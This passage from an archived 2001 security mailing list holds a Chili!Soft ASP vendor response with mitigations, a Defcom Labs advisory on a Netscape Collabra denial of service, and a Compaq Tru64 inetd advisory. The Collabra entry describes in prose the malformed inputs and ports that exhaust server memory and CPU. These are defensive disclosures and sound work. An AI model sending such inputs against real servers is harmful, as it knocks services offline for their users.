the sample ASP applications.  This "codebrws.asp" 
script can be exploited to view any 
files on the system where the full path to the file 
location is known.

Solution:  Disable the sample directories.  This can 
be done in different ways, depending 
on your environment.
a)  For Chili!Soft customers on Linux 
environments or using Chili!Soft ASP v3.6 
on AIX, go to the ASP Admin Console, click on the 
ASP Applications link, and remove 
all of the Chili!Soft ASP Applications that are listed.  
These all begin with the prefix 
b)  For customers on Solaris, HP, or 
previous AIX environments, telnet to the 
machine and change to the asp engines directory 
(/opt/casp/asp-apache-3000 by 
default).  Open the casp.cnfg file and comment out 
the Chili!Soft ASP Sample 
Applications listed at the bottom of the file under the 
[ASP Applications] section.  Again, 
these all begin with the prefix /caspsamp.
c)  The ability to view the ASP Sample 
applications is limited to the Root web 
server of a machine.  They can not be accessed 
from a virtual host by default.  If you 
are running in a shared hosting environment, your 
customers will only have the ability to 
access the /caspsamp virtual directory *if* they are 
connecting to the root web server on 
your machine.  Chili!Soft ASP has the ability to 
enable asp support on a per virtual host 
basis when used with Apache web servers.  You can 
disable ASP support for the root 
web server.  On Linux and AIX v3.6 installations, this 
can be done in the Admin 

Note:  *All* of the file access issues presented in the 
BugTraQ Advisory "Chili!Soft ASP 
Multiple Vulnerabilities" are directly related to the 
ability to reach the /caspsamp virtual 
directory.  If one can not view the ASP Sample 
applications from the web, one can not 
access the configuration and log files from the web.

Software Versions Affected:  All Chili!Soft releases on 

3)  Issue:  Chili!Soft ASP installs certain configuration 
files with permission settings that 
allow world-readable access.

Solution:  The removal of access to the ASP 
samples, by performing one of the steps 
listed in Item (2) above, will block the ability for 
anyone to view or modify the ASP 
configuration and log files without having direct 
access to the filesystem.  We have also 
determined that a number of the files can safely be 
set to a higher degree of security.  
Below is a list of what can be done at this time.
a)  All files in the ASP engines directory 
(/opt/casp/asp-apache-3000 by default), 
can be set to either 600 or 700 accordingly, EXCEPT 
casp.cnfg and odbc.ini.  These 
two files must not be set to any permissions lower 
than 644.
b)  In the CASP installation root directory 
(/opt/casp by default), you can change 
the permissions on the file to 600.

Other specific file permission issues are 
being addressed as quickly as possible 
and will be modified in an upcoming release.  
Changing permissions to these files 
necessitates some changes to our product that must 
be blessed by Quality Assurance 
prior to public release in order to ensure that the 
product will continue to function as 
expected.  We are well underway with this cycle and 
will try to post updates as 

Software Versions Affected:  All Chili!Soft releases on 
UNIX (on versions other than 
Linux, filenames and locations may be modified 

 4)  Issue:  InheritUser security mode does not 
properly set the Group ID.

Solution:  This must be addressed at the code level 
and thus there is no configuration 

def-2001-08: Netscape Collabra DoS

2001-02-26 Thread Peter Gründl

  Defcom Labs Advisory def-2001-08

  Netscape Collabra DoS

Author: Peter Grndl [EMAIL PROTECTED]
Release Date: 2001-02-26
=[Brief Description]=-
By sending malicious packets to the Netscape Collabra Server, it can
be brought to consume all available memory and CPU.

=[Affected Systems]=--
- Netscape Collabra Server V3.54 for Windows NT

--=[Detailed Description]=
The collabra server listens on the following TCP ports per default:
119, 5238, 5239 and 20749.

By sending approx. 5kb of A's to TCP port 5238 and then terminating
the connection, you will cause two handles to be be allocated and
approx. 4-5kb kernel memory per connection. The ressources are not
freed again, so the attack can take place very slowly and eventually
it will consume all available memory.

By sending a null character followed by seven or more characters to
TCP port 5239, you will cause the process srchs.exe to spike at 100%
CPU usage.

Filter TCP ports 5238 and 5239 from untrusted networks, and contact
Netscape Support, if you need further assistance.

-=[Vendor Response]=--
The Vendor was contacted January 4th, 2001 and then again four times
via phone and email. There is still no indication that the vendor
intends to fix this problem.

This release was brought to you by Defcom Labs


FW: COMPAQ SSRT0708U Security Advisory Tru64 V5.1 (only) inetd

2001-02-26 Thread Ben Greenbaum

-- Forwarded message --
Date: Mon, 26 Feb 2001 10:44:04 -0600
From: "Boren, Rich" [EMAIL PROTECTED]
Subject: FW: COMPAQ  SSRT0708U Security Advisory Tru64 V5.1 (only) inetd

Hash: SHA1

 SOURCE:  Compaq Computer CorporationSSRT0708U
Software Security Response Team

  TITLE:  Potential denial of Service in inetd Tru64 V5.1 Only
(Compaq Case ID: SSRT0708U)

   Date:  23-FEB-2000

  "Compaq is broadly distributing this Security Advisory in order
  to bring to the attention of users of Compaq products the
  important security information contained in this Advisory.
  Compaq recommends that all users determine the applicability of
  this information to their individual situations and take
  appropriate action.

  Compaq does not warrant that this information is necessarily
  accurate or complete for all user situations and, consequently,
  Compaq will not be responsible for any damages resulting from
  user's use or disregard of the information provided in this


  Versions Affected:
   Compaq's Tru64 UNIX  V5.1 ONLY (all patch levels)

   A potential security vulnerability has been discovered for
   Tru64 UNIX V5.1, where under certain circumstances, there
   is a problem with the inetd Internet services daemon that can
   cause it to stop accepting connections.   This causes all
   services handled by inetd to be inaccessible including ftp,
   telnet, rsh, rlogin, rexec, pop3, imap,  radius, etc..

  SEVERITY: Medium


   This problem exists in Tru64 UNIX 5.1 inetd only. The
   /usr/sbin/inetd is the master daemon for many services.
   The inetd may stop responding to requests if one of its
   services cores as it is being started. Inetd continues to run.
   The netstat -An command may indicate many outstanding
   connections to the same PCB.

   If you are installing Open Source Internet Solutions on Tru64 UNIX
   Version 5.1, it is strongly urged that you install this patch kit.

   If you are installing Open Source Internet Solutions
   on a Tru64 UNIX Version 5.1 TruCluster system, you must
   install this patch kit prior to installing Open Source
   Internet Solutions  because without it inetd failure during
   this procedure will cause an installation failure since it will
   interfere with intra-cluster communications.


  Compaq Tru64 UNIX engineering has provided a fix for this potential
  problem for Tru64 UNIX V5.1

  We apologize that this fix is not available from our patch site. If
  you determine that you need this fix please contact your
  normal Compaq  Services support channel and  request a
  patch using the reference SSRT0708U.

  This solution will be included in future releases of Tru64 UNIX
  V5.1 aggregate patch kits.

   To subscribe to automatically receive future NEW Security
   Advisories from the Software Security Response Team at
   Compaq via electronic mail,

   Use your browser to get to the
   and sign up.   Select "Security and Individual Notices" for
   immediate dispatch notifications.

  Compaq appreciates your cooperation and patience. We regret any
  inconvenience applying this information may cause.

  As always, Compaq urges you to periodically review your system
  management and security procedures.  Compaq will continue to
  review and enhance the security features of its products and work
  with customers to maintain and improve the security and integrity
  of their systems.

 (c) Copyright 2001 Compaq Computer Corporation.  All rights reserved

Version: PGPfreeware 6.5.8 for non-commercial use
